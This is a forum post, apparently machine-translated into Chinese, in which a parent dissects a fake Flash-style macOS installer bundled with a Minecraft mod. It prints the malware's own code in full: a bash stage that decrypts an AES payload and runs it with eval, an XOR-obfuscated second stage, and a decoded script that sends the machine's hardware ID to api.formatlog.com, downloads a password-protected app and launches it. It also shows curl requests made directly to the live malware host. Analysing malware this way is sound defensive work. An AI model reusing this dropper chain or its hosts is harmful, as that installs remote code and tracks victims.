我亲爱的补间女儿正在尝试安装Minecraft Mod ...其中一个mods使用了其中一种可怕的链接重定向程序,试图使您安装类似于Flash安装程序的东西,但显然不是
试图弄清楚受到了什么样的破坏...
检查代码签名:
/private/tmp/Player-2.dmg: code object is not signed at all
好吧..奇怪的是,安装时没有看门人吓坏了,必须以某种方式删除了元数据。
检查“安装程序”:
Executable=/Volumes/Player/Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0
Identifier=com.Iu_msA_jv4L_i3E0
Format=app bundle with generic
CodeDirectory v=20200 size=212 flags=0x0(none) hashes=1+3 location=embedded
Signature size=9057
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 1, 2019 at 12:32:28 PM
Info.plist entries=12
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=3
Internal requirements count=2 size=232
搜索“ Centoza雏菊”及其排列不会产生任何作用
现在我想知道可执行文件是怎么回事...
我发现它不是二进制文件... file告诉我它是bash ...,它包含4行(shebang发布):
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
cd "$fileDir"/Resources
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass "pass:7125667785" <enc)"
在资源中有3个文件,一个icns文件和2个base64编码文件,我假设它们是密钥和有效负载,分别为enc和enc2。
我收集到eval正在尝试运行从这2个文件解密的任何内容...它将起作用...我不知道如何操作,但让我们删除eval并查看会发生什么情况...
好吧,废话,发生的事情比我想的还要多...只是试图输出解密文件的内容,不小心尝试运行它...我应该已经删除了子外壳...
./Iu_msA_jv4L_i3E0: line 5: #!/bin/bash
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
pass="7125667785"
tmp_app="$tmp_path/Player_${pass: -3}.app"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass "pass:$pass" <enc2
unzip "$tmp_path/installer.zip" -d "$tmp_path" > /dev/null 2>&1
chmod 777 "$tmp_app/Contents/MacOS/*"
open -a "$tmp_app": No such file or directory
我猜想烧掉这台计算机,不妨动用它并评估损失...
#!/bin/bash
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
pass="7125667785"
tmp_app="$tmp_path/Player_${pass: -3}.app"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass "pass:$pass" <enc2
unzip "$tmp_path/installer.zip" -d "$tmp_path" > /dev/null 2>&1
chmod 777 "$tmp_app/Contents/MacOS/*"
open -a "$tmp_app"
基本上,看起来基本上是将enc2文件保存为tmp目录中的zip文件,然后将其解压缩...将应用程序的内容标记为可执行文件,然后尝试打开它...所以现在我们有了他们打算...我想我们可以帮助他们,希望不会意外地完全执行他们想要的东西。
$ openssl enc -base64 -d -aes-256-cbc -nosalt -out "fake_installer.zip" -pass "pass:7125667785" < Resources/enc2
好,检查一下:
$ ls
Info.plist MacOS Resources _CodeSignature fake_installer.zip
$ file fake_installer.zip
fake_installer.zip: Zip archive data, at least v1.0 to extract
好看,让洋葱再剥一层。
Archive: fake_installer.zip
creating: Player_785.app/
creating: Player_785.app/Contents/
creating: Player_785.app/Contents/_CodeSignature/
inflating: Player_785.app/Contents/_CodeSignature/CodeResources
inflating: Player_785.app/Contents/_CodeSignature/CodeDirectory
inflating: Player_785.app/Contents/_CodeSignature/CodeRequirements-1
inflating: Player_785.app/Contents/_CodeSignature/CodeSignature
inflating: Player_785.app/Contents/_CodeSignature/CodeRequirements
creating: Player_785.app/Contents/MacOS/
inflating: Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0
creating: Player_785.app/Contents/Resources/
inflating: Player_785.app/Contents/Resources/app7125667785.icns
inflating: Player_785.app/Contents/Resources/785
inflating: Player_785.app/Contents/Resources/enc
inflating: Player_785.app/Contents/Info.plist
哇,他们也对隐藏的应用进行了代码签名
哦,Centoza ...如果没有持久性的话……
Executable=/private/tmp/Player_playground/Player_785.app/Contents/Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0
Identifier=com.Iu_msA_jv4L_i3E0
Format=app bundle with generic
CodeDirectory v=20200 size=212 flags=0x0(none) hashes=1+3 location=embedded
Signature size=9058
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 1, 2019 at 12:32:25 PM
Info.plist entries=12
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=3
Internal requirements count=2 size=232
内部伪造安装程序与第一个相同...熵定律规定必须在某处结束。
但是解码的bash更加复杂...
_l() {
_i=0;_x=0;
for ((_i=0; _i<${#1}; _i+=2)) do
__return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
done
if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_m() {
_v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
__return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="7125667785"
_t="MTQxMDFkNTc1ZjU4MTg1NTU5NDY1ZjNiNTQ0MDU4NTU0MzVlNTc1YjE3NTY1NzQxNjA1OTViNDI1NTUwNzk1MDVmNTAxZTFmMTc0YzMyMTUxNzExMTI1MDRlNTU1YjQyNWM1MDUzNzU1YjQ3NDUwYjFmMTAxNzYzNTg1ZDQ3NTg1MzQ1MTg2NzRhNTA1NTVlNWQ0MTE5MTExNzEwMTc2MzU4NWQ0NzU4NTM0NTE4N2E1OTU2NWU1ZjQ2NWE0NTVlMTc3ZjdjMWExMDExMTUxYTYwNTk1YjQyNTU1MDQ0MWU2MDUwNTU1OTQxNTI0YTRjMTgxNjFiM2YzYzE2MTcxNzE4NTM1ODQzMTI0MzU5NWE0MjVhNWQ3MTVlNDMxMjVjNTgxNjE4NjE1NzU5NDI1YzU3NDYxOTFjMTgzZDE4MTUxNzExNTY1YTNjMTYxNzE3MTgxNTE3MTExMjQ2NWQ1ZjQ3MGEwODNmMTcxMTEyMTUxNjE2MTcxNzVlNWE0NTExNTc0ZDU1NWE0MjUzNWQ1MTczNTg0MDE1NWY1ODE3MTUxYzRlNTI0OTUxNTk0MzUyNTI1MzdjNWM0NTQyNjk3NTZiNGIxNTNkMTgxNTE3MTExMjE1MTYxNjUzNTgzMjE1MTcxMTEyMTUxNjE2MTcxNzE4MTUxNzU4NTQxNTZkNmQxNzE1MWM1MDRmNTI1ZTQwNTI1MzUzNzM1MTQ3MTUxMTBmMDgxNjE0MTM0MTU3NTk0MjVjNTc3MTVmNDQxNTE3NjU2ODBjMTE0NjVkNTM1ODNkMTcxODE1MTcxMTEyMTUxNjE2MTcxNzE4MTUxNzExMTI0NjVkNWY0NzBhMDkzZjE3MTExMjE1MTYxNjE3MTcxODE1MTcxMTEyMTUxNjE2NTU0NTVkNTQ1YzBhMzgxNTE2MTYxNzE3MTgxNTE3MTExMjE1MTY1MDVlM2QxODE1MTcxMTEyMTUxNjE2NTM1ODU2NTAzZDExMTIxNTE2MTYxNzE3MTg1YzUxMTE2OTE1MTI0NTVjNWU0ODE1MGEwYzEyMDQxNjZiMGMxNzRjNWQ1MjVmMzgxNTE2MTYxNzE3MTgxNTE3MTExMjE1MTY1NTU4NTk0YzVjNTk0NDU3MGUzYzE2MTcxNzE4MTUxNzExMTI1MzVmMTYzZDE3MTgxNTE3MTExMjE1MTYzYzE3MTcxODE1MTcxMTEyMTU1ZjUwMTc2YzE4MTg1MzExMTAxMTQwNTk1YjQyNTU1MDczNTg0MDFhMTIwNzE1MTc2NTBlMTc0NTVhNTA1ODNjMTcxNzE4MTUxNzExMTIxNTE2MTYxNzE3NWQ1NjVmNWUxMjE3MTI0MDU4NWI0ZDU4NTI3NTViNDcxNDBkM2QxNzE4MTUxNzExMTIxNTE2MTYxNzE3MTg0NzUyNDU0NzQ3NTgwZDE3M2QxODE1MTcxMTEyMTUxNjE2NTE1ZTMyMTUxNzExMTI1MTU5NTg1MjNkNDUzZjU0NDQ0MDQ3NTM1ODQzNzM1MTQ3MGExMzE2NjU2MTcyMTUzZDU5NDU0Nzc1NWI0NzBiMTQxMzFmNWM1YzQ1NWY1MzU4NTMxNjEzMWY1YzVjNDU1ZjUzNTg1MzE2MTUxMzViNDA0NTQzNTc1YjQyNzI1ZTQ1MWExYzFlMTMzODU0NDY0Njc5NTY1NTUwMGExMzE2MWQ1NDU3NDQ1MjU2NTQ1YTU0MTIxNzEyNTc0NzQ3N2M1YzQ1MTMxYjE3M2M0MDU4NWI0ZDU4NTI2ZTVjNTQ1YjUzMGExNTFjMWQ1MDU0NDY2MzU5NWE0MjVhNWQ3YjU2NWM1NzE1MTQxMjU2NDc0ODdiNTY1YzU3MTcxZjE0M2Q1ODRiNmE0MTU0NDA0NjVmNTk1OTBhMWExMTFmNDI0NTZhNDA1MzQ1NDQxODE4NDc0MzVkNTE0MzU1NDM2MTVkNDc0NDU4NWQ1YjFmMTQzZDQ0NWQ0NjQ0NTg1ZDViNjk1MTQyNWU1YzA4MTUxNTFhNDA0MzVmNTM1MDVkNWIxZTEzMzg1ODU3NTU1ZjVlNTY1MDY4NTg1NjA4MTQxMjFmNTI1YjVkNTgxMTFmNWIxNjE0MTMxZjUxNWE0NTU0NTUxNTFiNDQ1MzA2MTgxODU0MTE3YjdhNjY1YTU2NDM1ZTVhNDU1Yzc3NGQ0NjUzNDU0MzdjNTA0MTU4NTE1MDE2NGExNzUwNGE1MDQ3MTExZjVhMTYxMTE1N2U3NzY1NWI1MDQ2NTM1OTQ0NWE2MjZkN2M3MzEzMTIwODE2MTQ2YjFmMTYxZjZiMTgxMDEyMTY0YTE3NDQ1ZDUxMTcxYzc3MTUxYjU4MTcxMDRiNzUxOTFiMTAxZDZkNjgxNTZhMTMxYzE1NzE2ZTA0NzY0NjEwMWUxYTE1NGIxMTQ2NDcxNjFiNTM1NDE4MTI2YzZhMDg0NTQ0NWY1OTQzMDI2ODZhMTYxYjE3M2M0MzQ1NWIwNTE3NWY0NTQ2NDUwYzE5MTg1NjQ4NWMxOTU3NWQ0NzViNTc0MzViNTc1MjE5NTI1ZDU4MTk0NTUzMTgwNzU2MGEwODY1Njc0ZjU0NjYwYTA1MTM0MjBjMTY1ODU3NTU1ZjVlNTY1MDY4NTg1NjEzNDUwYjEzNDQ1ZDQ2NDQ1ODVkNWI2OTUxNDI1ZTVjMTM1ODBjMTY1YTQ1Njk0MTUyNGE0NjVlNWU1YzEzNTQwYjAwMDYwYTAwMDEwNzA1MDIwZTAzMTUzZDRkNWI0ZDU4NDI2YTQ2NTc0NDQ0NGY1YTQ1NTUwZjE3MDMwZTAwMDAwZTAzMDIwMzAzMDIwNzAyMDMwNjBmMDQwNTA0MDQwMzAxMDEwZjAyMWEzZjQzNWM0MjZhNDY1NzQzNWYwNTE3MTMxOTVmNWU0MjUzNWE0NzE4MWE0MzVjNDIxYTZlNmU2ZjZmNjA2ZDZmNjk2YTFjMTQzYzU0NDI0YTU5MTcxYzU0MDU3YTE2MTUxMzRkNDc1YjEzMTIwYjE5NTI1MjQxMTc1YjQyNWQ1ZTE1MDQwODExMDYxODBiMDkxNTQ2NTg0NjY5NDc1NjRjNWQzZDUwNDI0NTY5NTI1ZTQ1MDUxNzEzMTk1ZjVlNDI1MzVhNDcxODE4NTMxMTFkNDE1YjQ2MTg2ZjYwNmQ2ZjY5NmE2ZDZlMWYxODE1MzI0MDU5NGI1YjQ1MTYxYjY3MTcxYTExNDI1ZjQ4NWM0NjY5NDc1NjRiNDY0MDVlNDA1MTE0MTYxNTEzNGM1ODQ3NmU0MjU0NDI1ZTE1MTcxNTUxMTcxMzE2NTQ0NjQ2Njg1MzUxNDcxNTExMGMxNTE5NTI1MjQxMTc1YjQyNWQ1ZTE1MDQwODExMDYzMjQ3NWExMTFmNTMxNjEyNDM1YTQ4NmE0NzUwNDY1ZDNjNTA1ZTViNWQ2YTU5NTA1ZjUwMGIxNDEzMWY1ZjQ3NTI0MTEyMTg1YjA3MTcxYTRlMTUxNTFiMWM1NDQ2NDYxNTE3MDQxZDViNDIxMjE4MDcxNjE1MTM1OTQ1NDc2ZTU2NWM0NDE0MWUxZTFhM2Y0MTVlNWU0MDViNTM2ODU5NTk1ODUyMGMxMDExNGQ0MDU4NWI0ZDU4NTI2ZTVjNTQ1YjUzMTgxODE4MWExMjAzMDI0ODE0M2M1NDVmNTU1YTUzMTExOTRkMTYxNDEzNTY0ODQ1Njg1NTViNDcxMjUwNWU1YjVkNmE1OTUwNWY1MDE5NzU1ODU5NGM1MDU5NDU0MTFhN2I1NzU0Nzg2YjE3MTgxYjM4NWE0NjUzNTkxNzE1NTQxNzEzMTY1NDQ2NDY2ODUzNTE0NzEzNTc1YjU5NTM2OTU5NTY1NTUwMTUxMTFmMTg1NzQ0NTA0NDE4MTc0NDEzMTIxNzEyNDU1MjQ0NGI1YzU4NWY2ZDUyNDM1ZjUzMTUxODE3MTM0NzVkNTk0MzViNTI2ODU2NTQ1YTU0MTA="
eval "$(_m "$_t" "$_y")"
我无法用眼球来解析它,所以希望没有子弹和评估板,我不会自己动手...
function getVolumeName() {
excludedDirs=('/Volumes/Preboot/' '/Volumes/Macintosh HD/' '/Volumes/Recovery/')
for volumeDir in /Volumes/*/
do
skip=0
for excludedDir in "${excludedDirs[@]}"
do
if [[ "$excludedDir" == "$volumeDir" ]]; then
skip=1
break;
fi
done
if [ $skip == 1 ]; then
continue;
fi
if [ -d "$volumeDir/$1" ]; then
echo "$volumeDir";
return;
fi
done
}
currentDir="$PWD"
appDir="$(dirname $(dirname "$currentDir"))"
appName="$(basename "$appDir")"
volume_name="$(getVolumeName "$appName")"
os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
url="http://api.formatlog.com/sd/?c=9WRybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=7125667785"
unzip_password="587766521714417125667785"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "$url" >/dev/null 2>&1 >>$tmp_path
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "$unzip_password" "$tmp_path" -d "$app_dir" > /dev/null 2>&1
rm -f $tmp_path
file_name="$(grep -m1 -v "*.app" <(ls -1 "$app_dir"))"
volume_name="${volume_name// /%20}"
chmod +x "$app_dir$file_name/Contents/MacOS"/*
open -a "$app_dir$file_name" --args "s" "$session_guid" "$volume_name"
因此将格式记录到某个网址,然后打开从互联网下载的另一个应用程序...此时,我们可以执行远程代码,进行3层混淆处理...如果您可以在互联网上致电警察,现在是时候打电话给他们。
我们现在有一个DNS记录即将耗尽...哦,这是在巴拿马巴拿马城的一家公司中私下注册的...每个人都有巴拿马文件的副本,看看谁是坏人?
好吧..跟随白兔子...
curl 'http://api.formatlog.com/sd/?c=9WRybQ==&u=4&s=hi&o=_HaxorSauce10.4&b=7125667785'
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D">here</a>.</h2>
</body></html>
curl 'http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D'
PK;?N
$Player.app/
??ny4???ny4???ny4?PK;?N$Player.app/Contents/
... bunch of binary stuff...
让我们看看它到底是什么:
$ curl 'http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D' > out.something
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 386k 100 386k 0 0 1316k 0 --:--:-- --:--:-- --:--:-- 1318k
$ file out.something
out.something: Zip archive data, at least v2.0 to extract
解压缩时间
Archive: out.something
creating: Player.app/
creating: Player.app/Contents/
creating: Player.app/Contents/_CodeSignature/
[out.something] Player.app/Contents/_CodeSignature/CodeResources password:
skipping: Player.app/Contents/_CodeSignature/CodeResources incorrect password
神圣的抽烟...它提示我输入密码... zip文件...这种偏执狂使我偏执
哦,但是它确实在一分钟前给了我一个zip密码:unzip_password="587766521714417125667785"
它奏效了...
$ unzip out.something
Archive: out.something
[out.something] Player.app/Contents/_CodeSignature/CodeResources password:
inflating: Player.app/Contents/_CodeSignature/CodeResources
inflating: Player.app/Contents/MacOS/7161204793
inflating: Player.app/Contents/Resources/4793.icns
inflating: Player.app/Contents/Resources/Player.app/Contents/_CodeSignature/CodeResources
inflating: Player.app/Contents/Resources/Player.app/Contents/MacOS/019347364DF9
inflating: Player.app/Contents/Resources/Player.app/Contents/Resources/app7161204793.icns
inflating: Player.app/Contents/Resources/Player.app/Contents/Info.plist
inflating: Player.app/Contents/Info.plist
共同设计,冲洗并重复:
$codesign -d -vv Player.app/
Executable=/private/tmp/Player_playground/Player_785.app/Contents/Player_785.app/Contents/MacOS/jail/Player.app/Contents/MacOS/7161204793
Identifier=7161204793
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=970 flags=0x0(none) hashes=25+3 location=embedded
Signature size=9057
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 5, 2019 at 3:16:09 PM
Info.plist entries=10
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=5
Internal requirements count=1 size=172
但是这次...我们有一个二进制文件...而且很难判断正在执行什么...
$ nm -a 7161204793
U _CFStringGetCStringPtr
U _NSApp
U _NSLog
U _OBJC_CLASS_$_NSAppleScript
U _OBJC_CLASS_$_NSApplication
U _OBJC_CLASS_$_NSArray
U _OBJC_CLASS_$_NSData
U _OBJC_CLASS_$_NSException
U _OBJC_CLASS_$_NSMutableArray
U _OBJC_CLASS_$_NSMutableData
U _OBJC_CLASS_$_NSMutableString
U _OBJC_CLASS_$_NSNull
U _OBJC_CLASS_$_NSObject
U _OBJC_CLASS_$_NSString
U _OBJC_EHTYPE_$_NSException
U _OBJC_METACLASS_$_NSObject
U _TransformProcessType
U __Block_copy
U __DefaultRuneLocale
U __NSGetExecutablePath
U __Unwind_Resume
U __ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm
U __ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKcm
U __ZNKSt3__120__vector_base_commonILb1EE20__throw_length_errorEv
U __ZNKSt3__120__vector_base_commonILb1EE20__throw_out_of_rangeEv
U __ZNKSt3__121__basic_string_commonILb1EE20__throw_length_errorEv
U __ZNKSt3__16locale9use_facetERNS0_2idE
U __ZNKSt3__18ios_base6getlocEv
U __ZNSt11logic_errorC2EPKc
U __ZNSt12length_errorD1Ev
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6resizeEmc
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKcm
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED1Ev
U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSERKS5_
U __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev
U __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE6sentryC1ERS3_
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE6sentryD1Ev
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED0Ev
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED1Ev
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED2Ev
U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEElsEi
U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED2Ev
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE4syncEv
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5imbueERKNS_6localeE
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5uflowEv
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6setbufEPcl
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsgetnEPcl
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsputnEPKcl
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE9showmanycEv
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEEC2Ev
U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEED2Ev
U __ZNSt3__15ctypeIcE2idE
U __ZNSt3__16__sortIRNS_6__lessIccEEPcEEvT0_S5_T_
U __ZNSt3__16localeD1Ev
U __ZNSt3__18ios_base33__set_badbit_and_consider_rethrowEv
U __ZNSt3__18ios_base4initEPv
U __ZNSt3__18ios_base5clearEj
U __ZNSt3__19basic_iosIcNS_11char_traitsIcEEED2Ev
U __ZSt9terminatev
U __ZTINSt3__113basic_istreamIcNS_11char_traitsIcEEEE
U __ZTINSt3__113basic_ostreamIcNS_11char_traitsIcEEEE
U __ZTINSt3__114basic_iostreamIcNS_11char_traitsIcEEEE
U __ZTINSt3__115basic_streambufIcNS_11char_traitsIcEEEE
U __ZTISt12length_error
U __ZTVN10__cxxabiv117__class_type_infoE
U __ZTVN10__cxxabiv120__si_class_type_infoE
U __ZTVSt12length_error
U __ZThn16_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
U __ZThn16_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
U __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev
U __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev
U __ZTv0_n24_NSt3__113basic_ostreamIcNS_11char_traitsIcEEED0Ev
U __ZTv0_n24_NSt3__113basic_ostreamIcNS_11char_traitsIcEEED1Ev
U __ZTv0_n24_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
U __ZTv0_n24_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
U __ZdaPv
U __ZdlPv
U __Znam
U __Znwm
U ___CFConstantStringClassReference
U ___bzero
U ___cxa_allocate_exception
U ___cxa_atexit
U ___cxa_begin_catch
U ___cxa_end_catch
U ___cxa_free_exception
U ___cxa_throw
U ___gxx_personality_v0
U ___objc_personality_v0
U ___stack_chk_fail
U ___stack_chk_guard
U __dyld_register_func_for_add_image
0000000100000000 T __mh_execute_header
U __objc_empty_cache
U __objc_empty_vtable
U _abort
U _asprintf
U _bzero
U _calloc
U _chmod
U _class_addMethod
U _class_addProperty
U _class_addProtocol
U _class_getInstanceMethod
U _class_getInstanceSize
U _class_getInstanceVariable
U _class_getIvarLayout
U _class_getName
U _class_getSuperclass
U _class_isMetaClass
U _class_replaceMethod
U _class_respondsToSelector
U _closedir
U _free
U _hash_create
U _hash_search
U _inflate
U _inflateEnd
U _inflateInit_
U _ivar_getName
U _ivar_getOffset
U _kCFCoreFoundationVersionNumber
U _malloc
U _memchr
U _memcmp
U _memcpy
U _memset
U _method_setImplementation
U _objc_allocateClassPair
U _objc_autoreleasePoolPop
U _objc_autoreleasePoolPush
U _objc_autoreleaseReturnValue
U _objc_begin_catch
U _objc_constructInstance
U _objc_copyClassNamesForImage
U _objc_copyCppObjectAtomic
U _objc_end_catch
U _objc_getClass
U _objc_getMetaClass
U _objc_getProtocol
U _objc_getRequiredClass
U _objc_initializeClassPair
U _objc_lookUpClass
U _objc_msgSend
U _objc_msgSendSuper2
U _objc_msgSend_stret
U _objc_readClassPair
U _objc_registerClassPair
U _objc_release
U _objc_retain
U _objc_retainAutorelease
U _objc_retainAutoreleasedReturnValue
U _objc_storeStrong
U _object_getClass
U _object_getIndexedIvars
U _object_getIvar
U _object_setIvar
U _opendir$INODE64
U _property_copyAttributeList
U _protocol_getMethodDescription
U _protocol_getName
U _pthread_mutex_lock
U _pthread_mutex_unlock
U _readdir$INODE64
U _sel_getUid
U _srand
U _stat$INODE64
U _strcmp
U _strlen
U _strncmp
U _time
U dyld_stub_binder
一些用于字符串,stat,plist的C东西,一些Obj-C的东西,一些c ++的东西。有什么方法可以不运行而告诉它什么呢?